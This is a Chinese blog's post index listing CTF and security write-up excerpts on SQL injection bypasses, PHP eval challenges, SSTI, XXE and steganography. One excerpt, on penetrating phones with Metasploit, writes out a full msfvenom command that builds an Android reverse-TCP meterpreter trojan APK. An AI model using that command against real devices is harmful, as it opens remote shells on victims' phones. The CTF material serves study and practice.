自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 资源 (2)
  • 收藏
  • 关注

转载 [RoarCTF 2019]Easy Java

[RoarCTF 2019]Easy Java

2022-11-21 23:14:59 231 1

原创 [SUCTF 2019]Pythonginx

[SUCTF 2019]Pythonginx

2022-11-21 22:04:48 688

原创 [SWPU2019]Web1 (bypass information_schema,无列名注入)

打开环境,是个登录框:注册账号,登录后,有个广告发布,随便输入后查看详情后会回显:一下子就会想到是xss,于是我试了一下,果然还真存在xss:但是后来才知道没用,是个SQL题,注入点在标题那:按照步骤来,发现or,#都被过滤,空格会被消除,空格简单,用/**/就能绕过,但order by和information_schema都不能用,那咋判断字段数,不会要用union select一个个试吧(那这个题可能要搞傻),其实还可以用group by:1'/**/group..

2021-09-26 22:24:12 351

转载 EasyCleanup(session文件包含&条件竞争)

打开就是原码<?phpif(!isset($_GET['mode'])){ highlight_file(__file__);}else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell...

2021-09-26 11:49:50 1011 1

原创 CTFshow web10

打开环境,是登录页面:点击取消,自动下载源码文件index.phps:<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam);//将上面字符串全替换为空 .

2021-09-22 17:07:42 922

原创 [极客大挑战 2019]RCE ME

打开环境,得到源码:<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");

2021-09-09 17:35:47 1131

原创 Bugku 哥哥的秘密

给了个QQ号,说是空间里藏了东西,进入空间,有两个提示:hint1:解题流程为:收集空间信息--相册--收集微博信息--相册--解题--相册--提交flaghint2:解题部分题目需要下载原图才能看到哦说明第一步要在空间中找信息,往下看发现了一个类似盲文的东西:猜测可能是盲文加密,在线网站解密:文本加密为盲文,可自设密码|文本在线加密解密工具 (qqxiuzi.cn)⠀⡘⠀⡙⠀⡞⠀⡄⣿⠪⡛⣶⡸⠱⠀⠍⡥⣆⡗⠀⡎⢊==得到下一步提示:hint:密码=时地人,意思是密码是“时间地点...

2021-08-31 18:02:44 11755 7

原创 【2021祥云杯】 鸣雏恋

下载附件,是个压缩包,里面是个docx,打开:但是我们知道docx文档是可以当作压缩包解压的,所以我们可以将后缀改为zip,在解压得到的文件中找到love.zip和key.txt

2021-08-31 14:22:28 1014

转载 在不用浏览器的情况下发送HTTP请求

通常要实现http请求的时候需要用到浏览器,那如何在不用浏览器的情况下发送HTTP请求呢?一、在window下:首先打开我们的CMD;输入:telnet 网址 端口注意端口一般都为80,可能开的有其他不知道的端口。然后会出现空白页面,输入ctrl+],记住先回车,再编辑(走过的坑),最后输入下面内容。(注意一点,快速输入,因为连接时间很短,或者你可以使用记事本写好,然后直接复制。复制鼠标右键双击)。GET /index.html HTTP/1.1HOST:www...

2021-08-28 15:42:58 1207

转载 hosts文件

一、什么是hosts文件?Hosts是一个没有扩展名的系统文件,可以用记事本等工具打开。其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从Hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,则系统会再将网址提交DNS域名解析服务器进行IP地址的解析。需要注意的是,Hosts文件配置的映射是静态的,如果网络上的计算机更改了请及时更新IP地址,否则将不能访问。二、hosts文件能干什么?

2021-08-28 13:07:29 252

原创 [GWCTF 2019]枯燥的抽奖

打开环境,让我们猜号,还要猜中全部20位才能得flag??!!看一下前端源码,看到个check.php:访问一下果然有东西:<?php#这不是抽奖程序的源代码!不许看!header("Content-Type: text/html;charset=utf-8");//防止页面乱码session_start();//创建新会话或者重用现有会话if(!isset($_SESSION['seed'])){$_SESSION['seed']=rand(0,999999999).

2021-08-20 18:03:45 741

原创 [BSidesCF 2019]Kookie

打开环境,显示:提示中让用admin登录,且有账户cookie,我们就可以猜测到和cookie有关,所以抓个包:发现没有cookie,那应该就是要我们手动添加了,应该是添加:Cookie: username=admin就得到了答案,还有种方法就是在浏览器的application中的cookie中添加cookie值,刷新得答案:...

2021-08-19 18:24:17 100

原创 利用metasploit对手机进行渗透实战

第一步:用ifconfig命令查看本机ip地址第二步:用msfvenom -p命令生成apk木马文件具体命令为msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的

2021-08-18 17:31:17 3254

原创 BuuCTF 面具下的flag

下载附件,是个压缩包,解压得到一张图片,010editor发现里面藏有文件,foremost分离得到一个压缩包,加密了的,放进010editor,发现是伪加密解压得到flag.vmdx。vmdk是虚拟机的引导文件,但是这个只有3m大小,应该不是虚拟机的文件,不过我也试了新建一个虚拟机,试着导入这个文件,发现导入不了。经过百度了解到vmdk文件也是可以进行解压的,那么使用linux下的7z进行文件的解压:安装:sudo apt-get install p7zip-full#7z a y..

2021-08-13 19:51:42 489

原创 BuuCTF 九连环

下载附件,是一个加密压缩包,放进010editor,发现是伪加密:解压得到一张图片和一张加密压缩包,又将图片放进010editor,不是伪加密,那就应该是要用图片得到密码。图片用foremost分不出,用steghslove发现也不是lsb隐写,图片长宽也没问题,那还有什么方法在图片里藏信息呢?还有一种方法就是用steghide下载地址:https://sourceforge.net/projects/steghide/用法:1.查看已嵌入目标文件的图片的文件信息steghid.

2021-08-13 18:49:22 418

原创 BuuCTF 数据包中的线索

下载附件,得到一个pcappng的文件:看到这个后缀加上题目中有流量,就想到用wireshark打开,如果还不知道wireshark如何安装和使用可以看一下这篇文章:wireshark抓包新手使用教程 - 锅边糊 - 博客园 (cnblogs.com)打开后看到TCP的包,直接过滤http的包,查看HTTP包,看到第二个HTTP包中有类似于base64加密的东西:拿去解密:https://the-x.cn/base64发现是图片,另存为图片:得到答案。...

2021-08-06 19:12:02 712

原创 [MRCTF2020]套娃

打开环境,啥都没发现:F12看到一些源码:<!--//1st$query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!');} if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_.

2021-08-05 19:20:13 683 2

原创 [NCTF2019]True XML cookbook

打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞:XXE(XML External Entity Injection)全称为XML外部实体注入。XML是什么?XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么?设计目的不同:XML 被设计用来传输

2021-08-04 13:25:36 2591

原创 [BJDCTF2020]Cookie is so stable

打开环境,除了主页面有两个页面,flag.php和hint.php。flag.php是一个输入框:在hint.php的源代码中发现:让我们看看cookies,那就随便输入看下cookies:修改值随便尝试下,发现不是SQL注入也不是xss,那这时就想到可能是模板注入。验证方式是输入{{7*7}},如果显示49,说明是Twig;如果显示7777777说明是jinja2,...

2021-08-03 19:30:03 158

原创 [GYCTF2020]FlaskApp

打开环境,是一个用flask写的base64加密解密的工具:既然是flask,就应该和SSTI注入有关,我们试试加密{{7*7}},得到e3s3Kjd9fQ==,再把它拿去解密,得到no no no !!说明应该有什么过滤,我们再试试{{7+7}},得到14,说明存在SSTI注入。再来试试命令执行,用{{system('ls')}},还是显示no no no!我们并不知道具体过滤了些什么@app.route('/decode',methods=['POST','GET'])def d..

2021-08-03 18:57:57 451

原创 [BJDCTF2020]EasySearch

打开环境,是个登录框:随便输入后弹窗显示错误:SQL注入也没有什么发现,那就用dirsearch扫描一下,发现了index.php.swp,访问得到源码:<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,..

2021-08-02 18:43:08 271

原创 [CISCN2019 华东南赛区]Web11

打开环境:发现Build With Smarty !说明应该是与ssti模板注入有关。发现xff,还有右上角的Current IP:139.205.239.33,就尝试伪造一下IP:成功伪造,那就看看xff这个地方有无ssti注入漏洞:说明存在ssti注入漏洞,且为twig类型,我们试试能不能命令执行:成功执行了,那就简单了,当前目录下有apicssindex.phpsmartytemplates_cxffxff分别读取:X-Fo...

2021-07-30 18:44:57 240

原创 [MRCTF2020]Ezpop

打开环境,得到源码:Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var

2021-07-30 17:54:17 279

原创 [NPUCTF2020]ReadlezPHP

打开环境,没有发现,最后在源码中找到:点击跳转得到源码:<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ .

2021-07-28 11:16:17 526

原创 [极客大挑战 2019]FinalSQL

打开环境,看题目就知道是个SQL题,有个登录框,上面还有5个选项:依次点击一下:这是我们注意到上面的参数值在随之变化:他说在下一个,我们就改成id=6看看:说明注入点应该是在id这个位置,我们输入:id=6'显示:Error!说明存在SQL注入,接着:id=6'or 1=1#显示:你可别被我逮住了,臭弟弟,说明存在过滤,那过滤了哪些呢?我们来试一下,发现过滤了空格,等号,or,and,union,select这些都过滤得差不多了,...

2021-07-27 17:58:18 1646 1

原创 [MRCTF2020]PYWebsite

打开环境,是要让你购买flag,点击buy it now,出现了一个二维码:肯定不是真的给钱买,但抱着好奇的思想我还是扫了一下:就知道是这样,那我们就看一下源码,发现了一段代码感觉有用: function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode..

2021-07-27 10:35:17 313

原创 [网鼎杯 2020 朱雀组]Nmap

打开环境,是nmap的网页版:看一下源码:直接访问不行,说明要通过其他方式读取,看到Nmap就想到和先前的online tools有点相似,先随便输入一个IP:可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令:127.0.0.1 | ls可以看到|被\转义说明和[BUUCTF 2018] Online Tool一样肯定经过了escapeshellarg()函数和escapeshellcmd()函数的处理,前面[BUUCTF 2018] Online Tool的wp里...

2021-07-26 20:35:38 716

原创 [0CTF 2016]piapiapia

打开环境,是个登陆页面:一开始以为是SQL注入,结果尝试了很久都没成功,在源码中也没发现,那就用dirsearch扫描一下,得到一个www.zip,里面有几个文件:register.php:<?php require_once('class.php'); if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_PO...

2021-07-25 20:49:39 457 6

原创 [WUSTCTF2020]朴实无华

打开环境,显示:标题为繁体,意思是:人间极乐bot看到bot就应该想到robots.txt,访问robots.txt:看到有个fAke_f1agggg.php,一看就不是答案,但还是要访问:这明显不是,再看看源码,看看响应头:有个fl4g.php,再访问:得到这样一个页面,是繁体,整理翻译后,其中的代码为:<?phpheader('Content-type:text/html;charset=utf-8');error_reporti...

2021-07-24 17:38:40 349

原创 [CISCN 2019 初赛]Love Math

打开环境,直接给出了源码,进行审计:<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blackli

2021-07-23 19:40:05 116

原创 [安洵杯 2019]easy_serialize_php

打开环境,点击source_code,得到源码:<?php$function = @$_GET['f'];//GET方式传值function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g');//创建数组 $filter = '/'.implode('|',$filter_arr).'/i';//implode函数将数组中的值以‘|’分隔。 return preg_replac

2021-07-22 15:11:25 243 2

原创 [ASIS 2019]Unicorn shop

打开环境,是个商店,让你买东西,输入商品序号和价钱:有四种马可以买,我们购买试试,前3种在购买时都显示:只有最后一种不是,但当输入足够的价钱时显示:意思是只能输入一个字符,但我们只输入个位数时会显示:钱不够!!!说明就需要一个大于1337的字符,可以用别的语言来表示数字,Unicode字符中的一些特殊字符来代替输入的价格。https://www.compart.com/en/unicode/这个网站有很全的Unicode字符在其中找寻指代thousand...

2021-07-16 14:37:14 107

原创 [BSidesCF 2020]Had a bad day

打开环境,有两个选择按钮,woofers和meowers,随意点击一个,出现了一张小狗的图片,但url中有GET传参: index.php?category=woofers,怀疑是文件包含,访问一下woofers.php看存不存在:访问成功,再尝试修改category的值(后面加几个字母之类的):有include报错,这都说明是文件包含。那就可以尝试用php伪协议读取源码:url/index.php?category=php://filter/read=convert.ba..

2021-07-11 12:23:21 119 2

原创 [NCTF2019]Fake XML cookbook

打开环境,看到登录框,一开始以为是sql注入,后来才知道是xml外部实体注入(XXE)。

2021-06-18 17:23:10 2132 3

原创 [网鼎杯 2020 朱雀组]phpweb

打开环境,是一个非常优秀的图片,看一下源码,也没有发现,突然发现页面在自动刷新,就想到抓包一下:

2021-06-16 17:23:51 94 2

原创 [安洵杯 2019]easy_web

打开环境,页面没有发现,在url上看到有参数传递,cb5e08ab-2a7f-4acc-827b-eb50a64f87ad.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

2021-06-13 15:54:37 182 3

原创 [BJDCTF2020]Mark loves cat

打开环境,经过一番查找没有发现,后来dirsearch扫描后发现.git泄露,用git_extract下载得到flag.php和index.php。

2021-06-08 12:58:29 307 2

原创 [BJDCTF2020]The mystery of ip

打开环境,有个flag和hint,点击flag,发现有我们本机IP的回显,很有可能是http请求头中有XFF信息将我们ip一起带过去了,我们先试试伪造XFF头看看情况。

2021-06-07 21:21:49 103 3

原创 [BJDCTF2020]ZJCTF,不过如此

打开环境,直接给了源码:<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

2021-06-07 19:39:16 169

原创 [GWCTF 2019]我有一个数据库(cve-2018-12613漏洞)

环境打开,没有其他东西,只有几个字:用工具扫描(dirsearch等),发现了phpmyadmin页面,访问:phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者。原来是数据库,但是问题出在哪呢?就在php的版本,此数据库php版本为4.8.1,经过查找资料,此版本php存在一个远程文件包含漏洞,编号:cve-2018-12613以下是造成该漏洞的源码:$targ

2021-06-02 18:09:42 142

burpsuite_community_windows-x64_v2021_5_3.exe

网页抓包软件

2021-07-11

010Editor.rar

用于查看文件16进制代码

2021-07-11

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除